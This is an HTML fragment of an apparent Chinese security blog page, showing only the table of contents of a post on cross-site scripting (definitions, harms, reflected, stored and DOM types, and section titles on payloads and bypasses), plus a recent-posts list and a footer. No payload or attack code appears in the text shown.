class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB"><span class="toc-number">1.</span> <span class="toc-text">XSS(跨站脚本攻击)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">XSS漏洞简单介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E5%85%A8%E7%A7%B0%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC-Cross-Site-Scripting-%EF%BC%8C%E4%B8%BA%E9%81%BF%E5%85%8D%E4%B8%8E%E5%B1%82%E5%8F%A0%E6%A0%B7%E5%BC%8F%E8%A1%A8-Cascading-Style-Sheets-CSS-%E7%9A%84%E7%BC%A9%E5%86%99%E6%B7%B7%E6%B7%86%EF%BC%8C%E6%95%85%E7%BC%A9%E5%86%99%E4%B8%BAXSS%E3%80%82%E8%BF%99%E6%98%AF%E4%B8%80%E7%A7%8D%E5%B0%86%E4%BB%BB%E6%84%8F-Javascript-%E4%BB%A3%E7%A0%81%E6%8F%92%E5%85%A5%E5%88%B0%E5%85%B6%E4%BB%96Web%E7%94%A8%E6%88%B7%E9%A1%B5%E9%9D%A2%E9%87%8C%E6%89%A7%E8%A1%8C%E4%BB%A5%E8%BE%BE%E5%88%B0%E6%94%BB%E5%87%BB%E7%9B%AE%E7%9A%84%E7%9A%84%E6%BC%8F%E6%B4%9E%E3%80%82%E6%94%BB%E5%87%BB%E8%80%85%E5%88%A9%E7%94%A8%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9A%84%E5%8A%A8%E6%80%81%E5%B1%95%E7%A4%BA%E6%95%B0%E6%8D%AE%E5%8A%9F%E8%83%BD%EF%BC%8C%E5%9C%A8HTML%E9%A1%B5%E9%9D%A2%E9%87%8C%E5%B5%8C%E5%85%A5%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E3%80%82%E5%BD%93%E7%94%A8%E6%88%B7%E6%B5%8F%E8%A7%88%E8%AF%A5%E9%A1%B5%E9%9D%A2%E6%97%B6%EF%BC%8C%E8%BF%99%E4%BA%9B%E6%BD%9C%E5%85%A5%E5%9C%A8HTML%E4%B8%AD%E7%9A%84%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E4%BC%9A%E8%A2%AB%E6%89%A7%E8%A1%8C%EF%BC%8C%E7%94%A8%E6%88%B7%E6%B5%8F%E8%A7%88%E5%99%A8%E8%A2%AB%E6%94%BB%E5%87%BB%E8%80%85%E6%8E%A7%E5%88%B6%EF%BC%8C%E4%BB%8E%E8%80%8C%E8%BE%BE%E5%88%B0%E6%94%BB%E5%87%BB%E8%80%85%E7%9A%84%E7%89%B9%E6%AE%8A%E7%9B%AE%E7%9A%84%EF%BC%8C%E5%A6%82-cookie%E7%AA%83%E5%8F%96%E7%AD%89%E3%80%82"><span class="toc-number">2.1.</span> <span class="toc-text">XSS全称跨站脚本(Cross Site Scripting)，为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在HTML中的恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的，如 cookie窃取等。</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">XSS漏洞原理：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%A2%E6%88%90XSS%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%B8%BB%E8%A6%81%E5%8E%9F%E5%9B%A0%E6%98%AF%E7%A8%8B%E5%BA%8F%E5%AF%B9%E8%BE%93%E5%85%A5%E5%92%8C%E8%BE%93%E5%87%BA%E7%9A%84%E6%8E%A7%E5%88%B6%E4%B8%8D%E5%A4%9F%E4%B8%A5%E6%A0%BC%EF%BC%8C%E5%AF%BC%E8%87%B4%E2%80%9C%E7%B2%BE%E5%BF%83%E6%9E%84%E9%80%A0%E2%80%9D%E7%9A%84%E8%84%9A%E6%9C%AC%E8%BE%93%E5%85%A5%E5%90%8E%EF%BC%8C%E5%9C%A8%E8%BE%93%E5%88%B0%E5%89%8D%E7%AB%AF%E6%97%B6%E8%A2%AB%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BD%93%E4%BD%9C%E6%9C%89%E6%95%88%E4%BB%A3%E7%A0%81%E8%A7%A3%E6%9E%90%E6%89%A7%E8%A1%8C%E4%BB%8E%E8%80%8C%E4%BA%A7%E7%94%9F%E5%8D%B1%E5%AE%B3%E3%80%82"><span class="toc-number">3.1.</span> <span class="toc-text">形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格，导致“精心构造”的脚本输入后，在输到前端时被浏览器当作有效代码解析执行从而产生危害。</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E5%8D%B1%E5%AE%B3"><span class="toc-number">4.</span> <span class="toc-text">XSS漏洞危害</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC-%EF%BC%8C%E5%8C%85%E6%8B%AC%E8%8E%B7%E5%8F%96%E5%90%84%E7%B1%BB%E7%94%A8%E6%88%B7%E8%B4%A6%E5%8F%B7"><span class="toc-number">4.1.</span> <span class="toc-text">网络钓鱼 ，包括获取各类用户账号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AA%83%E5%8F%96%E7%94%A8%E6%88%B7cookies%E8%B5%84%E6%96%99-%EF%BC%8C%E4%BB%8E%E8%80%8C%E8%8E%B7%E5%8F%96%E7%94%A8%E6%88%B7%E9%9A%90%E7%A7%81%E4%BF%A1%E6%81%AF"><span class="toc-number">4.2.</span> <span class="toc-text">窃取用户cookies资料 ，从而获取用户隐私信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8A%AB%E6%8C%81%E7%94%A8%E6%88%B7%EF%BC%88%E6%B5%8F%E8%A7%88%E5%99%A8%EF%BC%89-%E4%BC%9A%E8%AF%9D-%EF%BC%8C%E4%BB%8E%E8%80%8C%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E6%93%8D%E4%BD%9C"><span class="toc-number">4.3.</span> <span class="toc-text">劫持用户（浏览器） 会话 ，从而执行任意操作</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%BA%E5%88%B6%E5%BC%B9%E5%87%BA%E5%B9%BF%E5%91%8A%E9%A1%B5%E9%9D%A2%E3%80%81-%E5%88%B7%E6%B5%81%E9%87%8F%E7%AD%89"><span class="toc-number">4.4.</span> <span class="toc-text">强制弹出广告页面、 刷流量等</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E9%A1%B5%E6%8C%82%E9%A9%AC"><span class="toc-number">4.5.</span> <span class="toc-text">网页挂马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%93%E5%90%88%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E-%EF%BC%8C%E5%A6%82csrf-%EF%BC%8C-%E5%AE%9E%E6%96%BD%E8%BF%9B%E6%AD%A5%E5%8D%B1%E5%AE%B3"><span class="toc-number">4.6.</span> <span class="toc-text">结合其他漏洞 ，如csrf ， 实施进步危害</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B"><span class="toc-number">5.</span> <span class="toc-text">XSS漏洞探测</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E5%BC%B9%E7%AA%97%E5%87%BD%E6%95%B0"><span class="toc-number">5.1.</span> <span class="toc-text">XSS漏洞弹窗函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%87%BD%E6%95%B0"><span class="toc-number">5.2.</span> <span class="toc-text">XSS漏洞控制台函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9Ednslog%E6%8E%A2%E6%B5%8B%E5%87%BD%E6%95%B0"><span class="toc-number">5.3.</span> <span class="toc-text">XSS漏洞dnslog探测函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B-1"><span class="toc-number">5.4.</span> <span class="toc-text">XSS漏洞探测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%99%BB%E9%99%86%EF%BC%8C%E6%B3%A8%E5%86%8C%EF%BC%8C%E7%95%99%E8%A8%80%EF%BC%8C%E8%AF%84%E4%BB%B7%EF%BC%8C%E6%90%9C%E7%B4%A2%E7%AD%89%E5%8A%9F%E8%83%BD"><span class="toc-number">5.4.1.</span> <span class="toc-text">登陆，注册，留言，评价，搜索等功能</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E6%8F%90%E4%BA%A4%EF%BC%9Aget-%EF%BC%8Cpost-%EF%BC%8Ccookie-%EF%BC%8Cheader%E5%A4%B4%E9%83%A8%E7%AD%89"><span class="toc-number">5.4.2.</span> <span class="toc-text">数据提交：get ，post ，cookie ，header头部等</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%84%E7%A7%8D%E6%8F%92%E4%BB%B6%EF%BC%8C%E7%BB%84%E4%BB%B6%EF%BC%8C%E5%AF%8C%E6%96%87%E6%9C%AC%E7%BC%96%E8%BE%91%E5%99%A8%E7%AD%89"><span class="toc-number">5.4.3.</span> <span class="toc-text">各种插件，组件，富文本编辑器等</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AA%E8%A6%81%E6%98%AF%E5%8F%AF%E4%BB%A5%E8%BE%93%E5%85%A5%E8%BE%93%E5%87%BA%E7%9A%84%E5%9C%B0%E6%96%B9%EF%BC%8C%E9%83%BD%E5%8F%AF%E4%BB%A5%E5%B0%9D%E8%AF%95%E6%8E%A2%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8xss%E6%BC%8F%E6%B4%9E"><span class="toc-number">5.4.4.</span> <span class="toc-text">只要是可以输入输出的地方，都可以尝试探测是否存在xss漏洞</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E5%B8%B8%E7%94%A8Payload"><span class="toc-number">5.5.</span> <span class="toc-text">XSS常用Payload</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%99%85%E6%B5%8B%E8%AF%95%E5%B8%B8%E7%94%A8%EF%BC%9A"><span class="toc-number">5.5.1.</span> <span class="toc-text">实际测试常用：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E7%B1%BB%E5%9E%8B"><span class="toc-number">6.</span> <span class="toc-text">XSS类型</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8BXSS"><span class="toc-number">7.</span> <span class="toc-text">反射型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%88%E7%A7%B0%E9%9D%9E%E6%8C%81%E4%B9%85%E5%9E%8BXSS-%EF%BC%8C%E8%BF%99%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F%E5%BE%80%E5%BE%80%E5%85%B7%E6%9C%89%E4%B8%80%E6%AC%A1%E6%80%A7%EF%BC%8C%E5%8F%AA%E5%9C%A8%E7%94%A8%E6%88%B7%E5%8D%95%E5%87%BB%E6%97%B6%E8%A7%A6%E5%8F%91%E3%80%82%E8%B7%A8%E7%AB%99%E4%BB%A3%E7%A0%81%E4%B8%80%E8%88%AC%E5%AD%98%E5%9C%A8%E9%93%BE%E6%8E%A5%E4%B8%AD%EF%BC%8C%E5%BD%93%E5%8F%97%E5%AE%B3%E8%80%85%E8%AF%B7%E6%B1%82%E8%BF%99%E6%A0%B7%E7%9A%84%E9%93%BE%E6%8E%A5%E6%97%B6%EF%BC%8C%E8%B7%A8%E7%AB%99%E4%BB%A3%E7%A0%81%E7%BB%8F%E8%BF%87%E6%9C%8D%E5%8A%A1%E7%AB%AF%E5%8F%8D%E5%B0%84%E5%9B%9E%E6%9D%A5%EF%BC%8C%E8%BF%99%E7%B1%BB%E8%B7%A8%E7%AB%99%E7%9A%84%E4%BB%A3%E7%A0%81%E9%80%9A%E5%B8%B8%E4%B8%8D%E5%AD%98%E5%82%A8%E6%9C%8D%E5%8A%A1%E7%AB%AF%E3%80%82"><span class="toc-number">7.1.</span> <span class="toc-text">又称非持久型XSS ，这种攻击方式往往具有一次性，只在用户单击时触发。跨站代码一般存在链接中，当受害者请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码通常不存储服务端。</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="toc-number">8.</span> <span class="toc-text">存储型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS%EF%BC%88-Stored-xss-Attacks%EF%BC%89%EF%BC%8C%E4%B9%9F%E6%98%AF%E6%8C%81%E4%B9%85%E5%9E%8BXSS-%EF%BC%8C%E6%AF%94%E5%8F%8D%E5%B0%84%E5%9E%8BXSS%E6%9B%B4%E5%85%B7%E6%9C%89%E5%A8%81%E8%83%81%E6%80%A7%E3%80%82%E6%94%BB%E5%87%BB%E8%84%9A%E6%9C%AC%E5%B0%86%E8%A2%AB%E6%B0%B8%E4%B9%85%E7%9A%84%E5%AD%98%E6%94%BE%E5%9C%A8%E7%9B%AE%E6%A0%87%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E6%88%96%E6%96%87%E4%BB%B6%E4%B8%AD%E3%80%82%E8%BF%99%E6%98%AF%E5%88%A9%E7%94%A8%E8%B5%B7%E6%9D%A5%E6%9C%80%E6%96%B9%E4%BE%BF%E7%9A%84%E8%B7%A8%E7%AB%99%E7%B1%BB%E5%9E%8B%EF%BC%8C%E8%B7%A8%E7%AB%99%E4%BB%A3%E7%A0%81%E5%AD%98%E5%82%A8%E4%BA%8E%E6%9C%8D%E5%8A%A1%E7%AB%AF%EF%BC%88%E6%AF%94%E5%A6%82%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%EF%BC%89"><span class="toc-number">8.1.</span> <span class="toc-text">存储型XSS（ Stored xss Attacks），也是持久型XSS ，比反射型XSS更具有威胁性。攻击脚本将被永久的存放在目标服务器的数据库或文件中。这是利用起来最方便的跨站类型，跨站代码存储于服务端（比如数据库中）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Dom%E5%9E%8BXSS"><span class="toc-number">9.</span> <span class="toc-text">Dom型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#DoM%E6%98%AF%E6%96%87%E6%A1%A3%E5%AF%B9%E8%B1%A1%E6%A8%A1%E5%9E%8B%EF%BC%88-Document-Object-Model%EF%BC%89%E7%9A%84%E7%BC%A9%E5%86%99%E3%80%82%E5%AE%83%E6%98%AFHTML%E6%96%87%E6%A1%A3%E7%9A%84%E5%AF%B9%E8%B1%A1%E8%A1%A8%E7%A4%BA%EF%BC%8C%E5%90%8C%E6%97%B6%E4%B9%9F%E6%98%AF%E5%A4%96%E9%83%A8%E5%86%85%E5%AE%B9%EF%BC%88%E4%BE%8B%E5%A6%82-JavaScript%EF%BC%89%E4%B8%8EHTML%E5%85%83%E7%B4%A0%E4%B9%8B%E9%97%B4%E7%9A%84%E6%8E%A5%E5%8F%A3%E3%80%82%E8%A7%A3%E6%9E%90%E6%A0%91%E7%9A%84%E6%A0%B9%E8%8A%82%E7%82%B9%E6%98%AF%E2%80%9C-Document%E2%80%9D%E5%AF%B9%E8%B1%A1%E3%80%82DOM%EF%BC%88-Document-object-model%EF%BC%89%EF%BC%8C%E4%BD%BF%E7%94%A8DOM%E8%83%BD%E5%A4%9F%E4%BD%BF%E7%A8%8B%E5%BA%8F%E5%92%8C%E8%84%9A%E6%9C%AC%E8%83%BD%E5%A4%9F%E5%8A%A8%E6%80%81%E8%AE%BF%E9%97%AE%E5%92%8C%E6%9B%B4%E6%96%B0%E6%96%87%E6%A1%A3%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%81%E7%BB%93%E6%9E%84%E5%92%8C%E6%A0%B7%E5%BC%8F%E3%80%82"><span class="toc-number">9.1.</span> <span class="toc-text">DoM是文档对象模型（ Document Object Model）的缩写。它是HTML文档的对象表示，同时也是外部内容（例如 JavaScript）与HTML元素之间的接口。解析树的根节点是“ Document”对象。DOM（ Document object model），使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%83%E6%98%AF%E5%9F%BA%E4%BA%8EDoM%E6%96%87%E6%A1%A3%E5%AF%B9%E8%B1%A1%E7%9A%84%E4%B8%80%E7%A7%8D%E6%BC%8F%E6%B4%9E%EF%BC%8C%E5%B9%B6%E4%B8%94DOM%E5%9E%8BXSS%E6%98%AF%E5%9F%BA%E4%BA%8EJS%E4%B8%8A%E7%9A%84%EF%BC%8C%E5%B9%B6%E4%B8%8D%E9%9C%80%E8%A6%81%E4%B8%8E%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%BF%9B%E8%A1%8C%E4%BA%A4%E4%BA%92%EF%BC%88%E5%9B%A0%E4%B8%BA%E5%89%8D%E7%AB%AF%E4%BB%A3%E7%A0%81%E9%83%BD%E5%9C%A8%E5%AE%A2%E6%88%B7%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%8A%E9%9D%A2%E6%89%A7%E8%A1%8C%EF%BC%8C%E5%92%8C%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%97%A0%E5%85%B3%EF%BC%89%E3%80%82"><span class="toc-number">9.2.</span> <span class="toc-text">它是基于DoM文档对象的一种漏洞，并且DOM型XSS是基于JS上的，并不需要与服务器进行交互（因为前端代码都在客户浏览器上面执行，和服务器无关）。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%82%A3%E4%B9%88dom%E5%9E%8Bxss%E7%9A%84%E4%BA%A7%E7%94%9F%E5%8E%9F%E5%9B%A0%E6%98%AF%E7%94%B1%E4%BA%8E%E5%89%8D%E7%AB%AFjs%E4%BB%A3%E7%A0%81%E7%9A%84DOM%E6%93%8D%E4%BD%9C%E5%AF%BC%E8%87%B4%E3%80%82"><span class="toc-number">9.3.</span> <span class="toc-text">那么dom型xss的产生原因是由于前端js代码的DOM操作导致。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#dom%E5%B0%B1%E6%98%AF%E4%B8%80%E4%B8%AA%E6%A0%91%E7%8A%B6%E7%9A%84%E6%A8%A1%E5%9E%8B%EF%BC%8C%E4%BD%A0%E5%8F%AF%E4%BB%A5%E7%BC%96%E5%86%99Javascript%E4%BB%A3%E7%A0%81%E6%A0%B9%E6%8D%AEdom%E4%B8%80%E5%B1%82%E4%B8%80%E5%B1%82%E7%9A%84%E8%8A%82%E7%82%B9%EF%BC%8C%E5%8E%BB%E9%81%8D%E5%8E%86-%E8%8E%B7%E5%8F%96-%E4%BF%AE%E6%94%B9%E5%AF%B9%E5%BA%94%E7%9A%84%E8%8A%82%E7%82%B9-%E5%AF%B9%E8%B1%A1-%E5%80%BC%E3%80%82%E9%80%9A%E8%BF%87Js%E5%8E%BB%E5%AF%B9%E7%BD%91%E9%A1%B5%E8%BF%9B%E8%A1%8C%E4%BF%AE%E6%94%B9%EF%BC%8C%E5%8F%98%E5%8C%96%E6%89%A7%E8%A1%8C"><span class="toc-number">9.4.</span> <span class="toc-text">dom就是一个树状的模型，你可以编写Javascript代码根据dom一层一层的节点，去遍历&#x2F;获取&#x2F;修改对应的节点,对象,值。通过Js去对网页进行修改，变化执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Document-%E5%AF%B9%E8%B1%A1%E4%BD%BF%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E4%BB%8E%E8%84%9A%E6%9C%AC%E4%B8%AD%E5%AF%B9-HTML-%E9%A1%B5%E9%9D%A2%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E5%85%83%E7%B4%A0%E8%BF%9B%E8%A1%8C%E8%AE%BF%E9%97%AE%E3%80%82"><span class="toc-number">9.5.</span> <span class="toc-text">Document 对象使我们可以从脚本中对 HTML 页面中的所有元素进行访问。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%AF%E8%83%BD%E8%A7%A6%E5%8F%91DOM%E5%9E%8BXSS%E7%9A%84js%E6%93%8D%E4%BD%9C%EF%BC%9A"><span class="toc-number">9.6.</span> <span class="toc-text">可能触发DOM型XSS的js操作：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%97%AD%E5%90%88%E6%A0%87%E7%AD%BE%EF%BC%9A"><span class="toc-number">9.7.</span> <span class="toc-text">闭合标签：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%88%91%E4%BB%AC%E5%AE%A2%E6%88%B7%E7%AB%AF%E7%9A%84js%E5%8F%AF%E4%BB%A5%E5%AF%B9%E9%A1%B5%E9%9D%A2dom%E8%8A%82%E7%82%B9%E8%BF%9B%E8%A1%8C%E5%8A%A8%E6%80%81%E7%9A%84%E6%93%8D%E4%BD%9C%EF%BC%8C%E6%AF%94%E5%A6%82%E6%8F%92%E5%85%A5%E3%80%81%E4%BF%AE%E6%94%B9%E9%A1%B5%E9%9D%A2%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82%E6%AF%94%E5%A6%82%E8%AF%B4%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%BB%8EURL%E4%B8%AD%E6%8F%90%E5%8F%96%E6%95%B0%E6%8D%AE%E5%B9%B6%E4%B8%94%E5%9C%A8%E6%9C%AC%E5%9C%B0%E6%89%A7%E8%A1%8C%E3%80%81%E5%A6%82%E6%9E%9C%E7%94%A8%E6%88%B7%E5%9C%A8%E5%AE%A2%E6%88%B7%E7%AB%AF%E8%BE%93%E5%85%A5%E7%9A%84%E6%95%B0%E6%8D%AE%E5%8C%85%E5%90%AB%E4%BA%86%E6%81%B6%E6%84%8F%E7%9A%84js%E8%84%9A%E6%9C%AC%E7%9A%84%E8%AF%9D%EF%BC%8C%E4%BD%86%E6%98%AF%E8%BF%99%E4%BA%9B%E8%84%9A%E6%9C%AC%E5%8F%88%E6%B2%A1%E6%9C%89%E5%81%9A%E4%BB%BB%E4%BD%95%E8%BF%87%E6%BB%A4%E5%A4%84%E7%90%86%E7%9A%84%E8%AF%9D%EF%BC%8C%E9%82%A3%E4%B9%88%E6%88%91%E4%BB%AC%E7%9A%84%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%B0%B1%E6%9C%89%E5%8F%AF%E8%83%BD%E5%8F%97%E5%88%B0DOM-based-XSS%E7%9A%84%E6%94%BB%E5%87%BB%E3%80%82%E5%9B%A0%E6%AD%A4DOM%E5%9E%8BXSS%E7%9A%84%E6%94%BB%E5%87%BB%E6%AD%A5%E9%AA%A4%E5%A6%82%E4%B8%8B%EF%BC%9A1-%E6%94%BB%E5%87%BB%E8%80%85%E6%9E%84%E9%80%A0%E5%87%BA%E7%89%B9%E6%AE%8A%E7%9A%84URL%E3%80%81%E5%9C%A8%E5%85%B6%E4%B8%AD%E5%8F%AF%E8%83%BD%E5%8C%85%E5%90%AB%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E3%80%822-%E7%94%A8%E6%88%B7%E6%89%93%E5%BC%80%E5%B8%A6%E6%9C%89%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E7%9A%84URL%E3%80%823-%E7%94%A8%E6%88%B7%E6%B5%8F%E8%A7%88%E5%99%A8%E6%94%B6%E5%88%B0%E5%93%8D%E5%BA%94%E5%90%8E%E8%A7%A3%E6%9E%90%E6%89%A7%E8%A1%8C%EF%BC%8C%E5%89%8D%E7%AB%AF%E4%BD%BF%E7%94%A8js%E5%8F%96%E5%87%BAurl%E4%B8%AD%E7%9A%84%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%B9%B6%E6%89%A7%E8%A1%8C%E3%80%824-%E6%89%A7%E8%A1%8C%E6%97%B6%EF%BC%8C%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E7%AA%83%E5%8F%96%E7%94%A8%E6%88%B7%E6%95%B0%E6%8D%AE%E5%B9%B6%E5%8F%91%E9%80%81%E5%88%B0%E6%94%BB%E5%87%BB%E8%80%85%E7%9A%84%E7%BD%91%E7%AB%99%E4%B8%AD%EF%BC%8C%E9%82%A3%E4%B9%88%E6%94%BB%E5%87%BB%E8%80%85%E7%BD%91%E7%AB%99%E6%8B%BF%E5%88%B0%E8%BF%99%E4%BA%9B%E6%95%B0%E6%8D%AE%E5%8E%BB%E5%86%92%E5%85%85%E7%94%A8%E6%88%B7%E7%9A%84%E8%A1%8C%E4%B8%BA%E6%93%8D%E4%BD%9C%E3%80%82%E8%B0%83%E7%94%A8%E7%9B%AE%E6%A0%87%E7%BD%91%E7%AB%99%E6%8E%A5%E5%8F%A3%E6%89%A7%E8%A1%8C%E6%94%BB%E5%87%BB%E8%80%85%E4%B8%80%E4%BA%9B%E6%93%8D%E4%BD%9C%E3%80%82"><span class="toc-number">9.7.1.</span> <span class="toc-text">我们客户端的js可以对页面dom节点进行动态的操作，比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话，但是这些脚本又没有做任何过滤处理的话，那么我们的应用程序就有可能受到DOM-based XSS的攻击。因此DOM型XSS的攻击步骤如下：1. 攻击者构造出特殊的URL、在其中可能包含恶意代码。2. 用户打开带有恶意代码的URL。3. 用户浏览器收到响应后解析执行，前端使用js取出url中的恶意代码并执行。4. 执行时，恶意代码窃取用户数据并发送到攻击者的网站中，那么攻击者网站拿到这些数据去冒充用户的行为操作。调用目标网站接口执行攻击者一些操作。</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS%E6%94%BB%E5%87%BB%E5%88%A9%E7%94%A8"><span class="toc-number">10.</span> <span class="toc-text">XSS攻击利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E5%B8%B8%E7%94%A8%E7%BB%95%E8%BF%87"><span class="toc-number">10.1.</span> <span class="toc-text">XSS常用绕过</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Posts</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/08/05/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入">SQL注入</a><time datetime="2026-08-05T03:59:15.000Z" title="Created 2026-08-05 11:59:15">2026-08-05</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/08/05/XSS%E6%B3%A8%E5%85%A5/" title="XSS注入">XSS注入</a><time datetime="2026-08-05T00:37:12.000Z" title="Created 2026-08-05 08:37:12">2026-08-05</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/08/04/%E6%95%B0%E9%80%9A%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" title="数通网络基础知识">数通网络基础知识</a><time datetime="2026-08-04T01:16:42.000Z" title="Created 2026-08-04 09:16:42">2026-08-04</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/07/30/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" title="渗透测试">渗透测试</a><time datetime="2026-07-30T00:39:46.000Z" title="Created 2026-07-30 08:39:46">2026-07-30</time></div></div></div></div></div></div></main><footer id="footer"><div class="footer-other"><div class="footer-copyright"><span class="copyright">&copy;&nbsp;2025 - 2026 By John Doe</span><span class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 7.1.1</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.6.0</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Reading Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Toggle Between Light and Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle Between Single-column and Double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="Settings"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back to Top"><span class="scroll-percent"></span><i class="fas 